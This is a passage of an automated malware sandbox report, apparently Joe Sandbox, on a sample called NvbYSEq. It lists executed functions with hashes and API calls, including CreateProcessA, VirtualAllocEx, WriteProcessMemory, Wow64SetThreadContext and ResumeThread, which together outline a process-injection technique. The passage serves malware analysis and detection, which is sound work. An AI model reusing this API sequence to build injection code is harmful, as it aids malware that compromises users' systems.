39935 c5aec4 39933->39935 39934->39935 39949 c5b118 39934->39949 39953 c5b128 39934->39953 39935->39930 39936 c5aebc 39936->39935 39937 c5b0c8 GetModuleHandleW 39936->39937 39938 c5b0f5 39937->39938 39938->39930 39942 c5aea1 39941->39942 39943 c5aec4 39941->39943 39942->39943 39947 c5b118 LoadLibraryExW 39942->39947 39948 c5b128 LoadLibraryExW 39942->39948 39943->39930 39944 c5aebc 39944->39943 39945 c5b0c8 GetModuleHandleW 39944->39945 39946 c5b0f5 39945->39946 39946->39930 39947->39944 39948->39944 39950 c5b13c 39949->39950 39952 c5b161 39950->39952 39957 c5a8d0 39950->39957 39952->39936 39954 c5b13c 39953->39954 39955 c5a8d0 LoadLibraryExW 39954->39955 39956 c5b161 39954->39956 39955->39956 39956->39936 39958 c5b308 LoadLibraryExW 39957->39958 39960 c5b381 39958->39960 39960->39952 39961 c5d118 39962 c5d15e 39961->39962 39966 c5d2e8 39962->39966 39969 c5d2f8 39962->39969 39963 c5d24b 39972 c5ca00 39966->39972 39970 c5d326 39969->39970 39971 c5ca00 DuplicateHandle 39969->39971 39970->39963 39971->39970 39973 c5d360 DuplicateHandle 39972->39973 39974 c5d326 39973->39974 39974->39963 39975 c54668 39976 c5467a 39975->39976 39977 c54686 39976->39977 39979 c54779 39976->39979 39980 c5479d 39979->39980 39984 c54888 39980->39984 39988 c54878 39980->39988 39985 c548af 39984->39985 39986 c5498c 39985->39986 39992 c5449c 39985->39992 39990 c548af 39988->39990 39989 c5498c 39990->39989 39991 c5449c CreateActCtxA 39990->39991 39991->39989 39993 c55918 CreateActCtxA 39992->39993 39995 c559db 39993->39995 39995->39995

                                      Executed Functions

                                      Function 06912321 Relevance: .0, Instructions: 18COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545774999.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6910000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 94d6f5d5b3e4778eb7cee64d644c71b21169e27084e0c23c4d5b0ee017e2e834
                                      • Instruction ID: 67efe72b547e2d8498766f7c89ec03bf02bbaa7e5a99b781d7770bc0d3e31499
                                      • Opcode Fuzzy Hash: 94d6f5d5b3e4778eb7cee64d644c71b21169e27084e0c23c4d5b0ee017e2e834
                                      • Instruction Fuzzy Hash: 9DD05B64C0D248CED7D5FF2058802F566789717210F2C28955409AB602D9204BC2CA94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0686F850 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 524 686f850-686f8e5 526 686f8e7-686f8f1 524->526 527 686f91e-686f93e 524->527 526->527 528 686f8f3-686f8f5 526->528 532 686f977-686f9a6 527->532 533 686f940-686f94a 527->533 530 686f8f7-686f901 528->530 531 686f918-686f91b 528->531 534 686f905-686f914 530->534 535 686f903 530->535 531->527 543 686f9df-686fa99 CreateProcessA 532->543 544 686f9a8-686f9b2 532->544 533->532 537 686f94c-686f94e 533->537 534->534 536 686f916 534->536 535->534 536->531 538 686f950-686f95a 537->538 539 686f971-686f974 537->539 541 686f95e-686f96d 538->541 542 686f95c 538->542 539->532 541->541 546 686f96f 541->546 542->541 555 686faa2-686fb28 543->555 556 686fa9b-686faa1 543->556 544->543 545 686f9b4-686f9b6 544->545 547 686f9b8-686f9c2 545->547 548 686f9d9-686f9dc 545->548 546->539 550 686f9c6-686f9d5 547->550 551 686f9c4 547->551 548->543 550->550 552 686f9d7 550->552 551->550 552->548 566 686fb2a-686fb2e 555->566 567 686fb38-686fb3c 555->567 556->555 566->567 568 686fb30 566->568 569 686fb3e-686fb42 567->569 570 686fb4c-686fb50 567->570 568->567 569->570 571 686fb44 569->571 572 686fb52-686fb56 570->572 573 686fb60-686fb64 570->573 571->570 572->573 574 686fb58 572->574 575 686fb76-686fb7d 573->575 576 686fb66-686fb6c 573->576 574->573 577 686fb94 575->577 578 686fb7f-686fb8e 575->578 576->575 578->577
                                      APIs
                                      • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0686FA86
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 5bba83066d3672fe27df7058ef1623147975304c7d5cce5f2e46dded311eb1a3
                                      • Instruction ID: 63b4b9fbbdc33f8c4e0903ced6f3bebd230ef225091e6cc2c9c9fa3b283dfa9c
                                      • Opcode Fuzzy Hash: 5bba83066d3672fe27df7058ef1623147975304c7d5cce5f2e46dded311eb1a3
                                      • Instruction Fuzzy Hash: 27917971D00319DFEB60DF69D841BEEBBB2BB48304F1485A9E908E7280DB759985CF91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5AE90 Relevance: 1.7, APIs: 1, Instructions: 197COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 580 c5ae90-c5ae9f 581 c5aea1-c5aeae call c59898 580->581 582 c5aecb-c5aecf 580->582 587 c5aec4 581->587 588 c5aeb0 581->588 584 c5aed1-c5aedb 582->584 585 c5aee3-c5af24 582->585 584->585 591 c5af26-c5af2e 585->591 592 c5af31-c5af3f 585->592 587->582 635 c5aeb6 call c5b118 588->635 636 c5aeb6 call c5b128 588->636 591->592 593 c5af41-c5af46 592->593 594 c5af63-c5af65 592->594 596 c5af51 593->596 597 c5af48-c5af4f call c5a874 593->597 599 c5af68-c5af6f 594->599 595 c5aebc-c5aebe 595->587 598 c5b000-c5b0c0 595->598 601 c5af53-c5af61 596->601 597->601 630 c5b0c2-c5b0c5 598->630 631 c5b0c8-c5b0f3 GetModuleHandleW 598->631 602 c5af71-c5af79 599->602 603 c5af7c-c5af83 599->603 601->599 602->603 605 c5af85-c5af8d 603->605 606 c5af90-c5af92 call c5a884 603->606 605->606 610 c5af97-c5af99 606->610 611 c5afa6-c5afab 610->611 612 c5af9b-c5afa3 610->612 613 c5afad-c5afb4 611->613 614 c5afc9-c5afd6 611->614 612->611 613->614 616 c5afb6-c5afc6 call c5a894 call c5a8a4 613->616 621 c5aff9-c5afff 614->621 622 c5afd8-c5aff6 614->622 616->614 622->621 630->631 632 c5b0f5-c5b0fb 631->632 633 c5b0fc-c5b110 631->633 632->633 635->595 636->595
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00C5B0E6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: ce5f25921756f543d094ad94947f877b12e6bab5512b3c44ac1e68766c77bce8
                                      • Instruction ID: e9921f37530852ed55373878402ddf9494227a121c78b9c9a63455527da75226
                                      • Opcode Fuzzy Hash: ce5f25921756f543d094ad94947f877b12e6bab5512b3c44ac1e68766c77bce8
                                      • Instruction Fuzzy Hash: D87169B4A00B058FDB24DF6AD04175ABBF1FF88301F008A2DE856D7A50D775E98ACB95
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C55A84 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 637 c55a84-c55b14
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bca80c09c2272e391c514a2c90a564997d5aefa32e20c916351c896b3530d713
                                      • Instruction ID: bb05fdb41958ab1ad6f07b912df95709e61e3cf3b176bf60c15a71ba5d06c81d
                                      • Opcode Fuzzy Hash: bca80c09c2272e391c514a2c90a564997d5aefa32e20c916351c896b3530d713
                                      • Instruction Fuzzy Hash: E941DDB9C05B48CFEF10CFA4C8557EDBBB0EF06315F20818AC8566B251C775A98ADB45
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5590C Relevance: 1.6, APIs: 1, Instructions: 98COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 640 c5590c-c5598c 642 c5598f-c559d9 CreateActCtxA 640->642 644 c559e2-c55a3c 642->644 645 c559db-c559e1 642->645 652 c55a3e-c55a41 644->652 653 c55a4b-c55a4f 644->653 645->644 652->653 654 c55a51-c55a5d 653->654 655 c55a60 653->655 654->655 657 c55a61 655->657 657->657
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00C559C9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 29d1bf063858fe63c90e232f686d5e45b892cb481219544aa614d077f483126c
                                      • Instruction ID: f4d1bdff25afee57a160346213f02827cc1763aa778cf903c90cd8923027c721
                                      • Opcode Fuzzy Hash: 29d1bf063858fe63c90e232f686d5e45b892cb481219544aa614d077f483126c
                                      • Instruction Fuzzy Hash: 9241E2B4C00B19CBDB24CFA9C8847DDBBB5BF48304F20856AD459AB251DB75698ACF50
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 04B50BFC Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 658 4b50bfc-4b542fc 661 4b54302-4b54307 658->661 662 4b543ac-4b543cc call 4b50ad4 658->662 663 4b54309-4b54340 661->663 664 4b5435a-4b54392 CallWindowProcW 661->664 669 4b543cf-4b543dc 662->669 671 4b54342-4b54348 663->671 672 4b54349-4b54358 663->672 667 4b54394-4b5439a 664->667 668 4b5439b-4b543aa 664->668 667->668 668->669 671->672 672->669
                                      APIs
                                      • CallWindowProcW.USER32(?,?,?,?,?), ref: 04B54381
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1544225133.0000000004B50000.00000040.00000800.00020000.00000000.sdmp, Offset: 04B50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_4b50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: CallProcWindow
                                      • String ID:
                                      • API String ID: 2714655100-0
                                      • Opcode ID: 301302ee7a03cbf99657312a79193b9f4ea3b6acc5ee2710151eeb6908246c44
                                      • Instruction ID: 48455cd8643d9d1e9aac28ca94e32abc95751c4a8846b2f9d09d0d8307620d0e
                                      • Opcode Fuzzy Hash: 301302ee7a03cbf99657312a79193b9f4ea3b6acc5ee2710151eeb6908246c44
                                      • Instruction Fuzzy Hash: 8D4117B59002059FDB14CF99C448BAAFBF5FF88314F248499E819AB321D375A845CBA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5449C Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 675 c5449c-c559d9 CreateActCtxA 679 c559e2-c55a3c 675->679 680 c559db-c559e1 675->680 687 c55a3e-c55a41 679->687 688 c55a4b-c55a4f 679->688 680->679 687->688 689 c55a51-c55a5d 688->689 690 c55a60 688->690 689->690 692 c55a61 690->692 692->692
                                      APIs
                                      • CreateActCtxA.KERNEL32(?), ref: 00C559C9
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: Create
                                      • String ID:
                                      • API String ID: 2289755597-0
                                      • Opcode ID: 1c76238b7608b932698d1cae86aeef8ed83532979d65e4de79f298d8668f8d10
                                      • Instruction ID: ac4ec8cec496cdc58cae89ad24849439a6b97ae26384d92a480c4bd657a1052c
                                      • Opcode Fuzzy Hash: 1c76238b7608b932698d1cae86aeef8ed83532979d65e4de79f298d8668f8d10
                                      • Instruction Fuzzy Hash: 6241C3B4C00B1DCBDB24CFA9C844BDEBBB5BF48304F20856AD459AB251DB756989CF90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5D421 Relevance: 1.6, APIs: 1, Instructions: 87COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 693 c5d421-c5d428 694 c5d3e4-c5d3f4 DuplicateHandle 693->694 695 c5d42a-c5d54e 693->695 696 c5d3f6-c5d3fc 694->696 697 c5d3fd-c5d41a 694->697 696->697
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5D326,?,?,?,?,?), ref: 00C5D3E7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: 214d76b97e3ccab32451aa67a0a669b225d125f67b4ba5a98874c7719d0c3516
                                      • Instruction ID: 32c4b3d076560073d930eaf6c5076f4e6b02934b216e32fb855bec915343b2e6
                                      • Opcode Fuzzy Hash: 214d76b97e3ccab32451aa67a0a669b225d125f67b4ba5a98874c7719d0c3516
                                      • Instruction Fuzzy Hash: CF316B746403808FE704DFA0E845B6E3BA2F7D9311F10853AE9158B3E5CAB8484BEB11
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0686F5C8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 711 686f5c8-686f616 713 686f626-686f665 WriteProcessMemory 711->713 714 686f618-686f624 711->714 716 686f667-686f66d 713->716 717 686f66e-686f69e 713->717 714->713 716->717
                                      APIs
                                      • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 0686F658
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: a6b82d86b6a7ebc342b1b8dad45d72a1beaa15f45c45252ca4b64c2bbba37581
                                      • Instruction ID: 8e44bbe319ee8808a9f4160d5695ec97c76b0ead575d56b3548889586bb68765
                                      • Opcode Fuzzy Hash: a6b82d86b6a7ebc342b1b8dad45d72a1beaa15f45c45252ca4b64c2bbba37581
                                      • Instruction Fuzzy Hash: EC2157719003099FDF00CFAAC881BDEBBF5FF48310F508429EA19A7250D7799944CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5CA00 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 721 c5ca00-c5d3f4 DuplicateHandle 723 c5d3f6-c5d3fc 721->723 724 c5d3fd-c5d41a 721->724 723->724
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5D326,?,?,?,?,?), ref: 00C5D3E7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: b17e5bb8ca358f06ff88da44733fe541be935522e7d48aa0911d1aef83c7f426
                                      • Instruction ID: 77342021bb46e6809f1bb6b01949e118a88c5986d12639600778bfce47452025
                                      • Opcode Fuzzy Hash: b17e5bb8ca358f06ff88da44733fe541be935522e7d48aa0911d1aef83c7f426
                                      • Instruction Fuzzy Hash: E321E3B5900349DFDB10CFAAD484AEEBBF4FB48310F14802AE955A7350D379A954CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5D358 Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 727 c5d358-c5d3f4 DuplicateHandle 728 c5d3f6-c5d3fc 727->728 729 c5d3fd-c5d41a 727->729 728->729
                                      APIs
                                      • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C5D326,?,?,?,?,?), ref: 00C5D3E7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: DuplicateHandle
                                      • String ID:
                                      • API String ID: 3793708945-0
                                      • Opcode ID: de41708af4a7a66bb0ee3fd07f1f89e6d4e658472f36a5c4643de5889c2f2b0d
                                      • Instruction ID: ccbef63621dd65516a45be2a920a78cda482ef49e9e6a5fa3f8101dee7034beb
                                      • Opcode Fuzzy Hash: de41708af4a7a66bb0ee3fd07f1f89e6d4e658472f36a5c4643de5889c2f2b0d
                                      • Instruction Fuzzy Hash: 1321E4B5901209DFDB10CFAAD484ADEFBF4EB48310F14802AE958A7350D379A955CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0686F6B8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 742 686f6b8-686f745 ReadProcessMemory 745 686f747-686f74d 742->745 746 686f74e-686f77e 742->746 745->746
                                      APIs
                                      • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0686F738
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: ad735e5d9c06ea690ec4bbe328ceae1828a3210fcab872552bcb6bbba5941e8e
                                      • Instruction ID: b76353eae635d065acd527b4f854a6ef6bacdc833c0e85cffbaa29c1a2517965
                                      • Opcode Fuzzy Hash: ad735e5d9c06ea690ec4bbe328ceae1828a3210fcab872552bcb6bbba5941e8e
                                      • Instruction Fuzzy Hash: FD2125B18003499FDF10CFAAC885BEEBBF5FF48310F54842AE959A7240C7799945CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0686EFF8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 732 686eff8-686f043 734 686f045-686f051 732->734 735 686f053-686f083 Wow64SetThreadContext 732->735 734->735 737 686f085-686f08b 735->737 738 686f08c-686f0bc 735->738 737->738
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 0686F076
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 251306bd4cbd4282b2eefeab1ca6f720e4810c14b9a04e6ba2232a1b20f00e15
                                      • Instruction ID: d6e7a59b2a933c39eb39f283549d96ece8c12183bc27aca30c248230162ca32c
                                      • Opcode Fuzzy Hash: 251306bd4cbd4282b2eefeab1ca6f720e4810c14b9a04e6ba2232a1b20f00e15
                                      • Instruction Fuzzy Hash: 1C217771D003088FDB10CFAAC4857EEBBF5EF48314F54842AD559A7241CBB89944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5A8D0 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C5B161,00000800,00000000,00000000), ref: 00C5B372
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 94998b25639c4d62b6239d95d51c6c8740665c333b48a415f2866e183e3dfa30
                                      • Instruction ID: d06d232a49965c7a5c69b1c13c3d92953595b93c0279124410fb3faa664a8b82
                                      • Opcode Fuzzy Hash: 94998b25639c4d62b6239d95d51c6c8740665c333b48a415f2866e183e3dfa30
                                      • Instruction Fuzzy Hash: 661114B68003489FDB10CF9AC444BEEFBF4EB48310F14842AE859B7210C775A949CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0686F508 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0686F576
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: c7ad9f799a7e9ad75d2bbeac014805f64bd2a8a5cf5880ebc1785a7ab15f9091
                                      • Instruction ID: 5597f7eb396792fc3d5abd210f5b9568a4e579eb3cf88683e8dc9a5603a3014f
                                      • Opcode Fuzzy Hash: c7ad9f799a7e9ad75d2bbeac014805f64bd2a8a5cf5880ebc1785a7ab15f9091
                                      • Instruction Fuzzy Hash: 481126718003489FDB10DFAAD844BDEBBF5EB48310F148429E655A7250C7759944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0686EB08 Relevance: 1.6, APIs: 1, Instructions: 52threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 74d85d8b2e6006783733b341585210d369f642f022c1ab21b153a12b482d4f1a
                                      • Instruction ID: 833c60cb8582c541294ea3b6189c7c1f43539955b769371f1f105d5319a7c77d
                                      • Opcode Fuzzy Hash: 74d85d8b2e6006783733b341585210d369f642f022c1ab21b153a12b482d4f1a
                                      • Instruction Fuzzy Hash: 581158B58043488FDB10CFAAC4457EEFBF4EB48324F24842AD55AA7240C7799545CF94
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5B300 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C5B161,00000800,00000000,00000000), ref: 00C5B372
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: ad45cf9815541abd6127f883d3624c08b0fb91af9d7928705f74662988a61fb6
                                      • Instruction ID: 17665f0e74f5f56163d8b1f25115b06e01ae67d4d279f59548643b6e578dff12
                                      • Opcode Fuzzy Hash: ad45cf9815541abd6127f883d3624c08b0fb91af9d7928705f74662988a61fb6
                                      • Instruction Fuzzy Hash: 9C1114B6C00349CFDB10CFAAC444ADEFBF4EB48310F14852AD829A7650C375AA45CFA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 06913260 Relevance: 1.6, APIs: 1, Instructions: 51windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069132C5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545774999.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6910000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: f60410fdf3a8b8dc7cf0ede93e11a8f43a1bb8050da2afd8737992c2f72ba9da
                                      • Instruction ID: e6dd24010c41bf650f7af30164b1f1659d2525a9366dad268e4b7a76c96859c7
                                      • Opcode Fuzzy Hash: f60410fdf3a8b8dc7cf0ede93e11a8f43a1bb8050da2afd8737992c2f72ba9da
                                      • Instruction Fuzzy Hash: 47113AB5804388CFCB11CFA9C444BDEBFF4AB09310F24885AD454A7652C375A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0686EB10 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545550976.0000000006860000.00000040.00000800.00020000.00000000.sdmp, Offset: 06860000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6860000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: ba885e1d20c7a39bc73973d1ba7ac259f390cccc78df388f21ccb329376b5a23
                                      • Instruction ID: c72f6618bfe9377bf569bd7b6279721dbcd0f7afc18e79001289b1121248a1d9
                                      • Opcode Fuzzy Hash: ba885e1d20c7a39bc73973d1ba7ac259f390cccc78df388f21ccb329376b5a23
                                      • Instruction Fuzzy Hash: 701136B5D043488FDB10DFAAC4457EFFBF4EB88324F248429D559A7240CB79A944CBA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 06910B28 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • PostMessageW.USER32(?,00000010,00000000,?), ref: 069132C5
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1545774999.0000000006910000.00000040.00000800.00020000.00000000.sdmp, Offset: 06910000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_6910000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: MessagePost
                                      • String ID:
                                      • API String ID: 410705778-0
                                      • Opcode ID: b14eec6d1d47ffb789333e6086656b9ef763e76973c62071bbca6fdd6b348f76
                                      • Instruction ID: a41c947d9db5812c1bdbc3234396e64bf89e6184273f23eae0fa58d7324cb10b
                                      • Opcode Fuzzy Hash: b14eec6d1d47ffb789333e6086656b9ef763e76973c62071bbca6fdd6b348f76
                                      • Instruction Fuzzy Hash: 1A11F2B5804348DFDB50DF9AC845BDEBBF8EB48314F208819E959A7600C3B5A944CFA1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00C5B080 Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNELBASE(00000000), ref: 00C5B0E6
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1538071371.0000000000C50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C50000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_c50000_NvbYSEq.jbxd
                                      Similarity
                                      • API ID: HandleModule
                                      • String ID:
                                      • API String ID: 4139908857-0
                                      • Opcode ID: eed368506392f53a7b8c62eec8f204ceca0c033c9963439794c94b276c572fb0
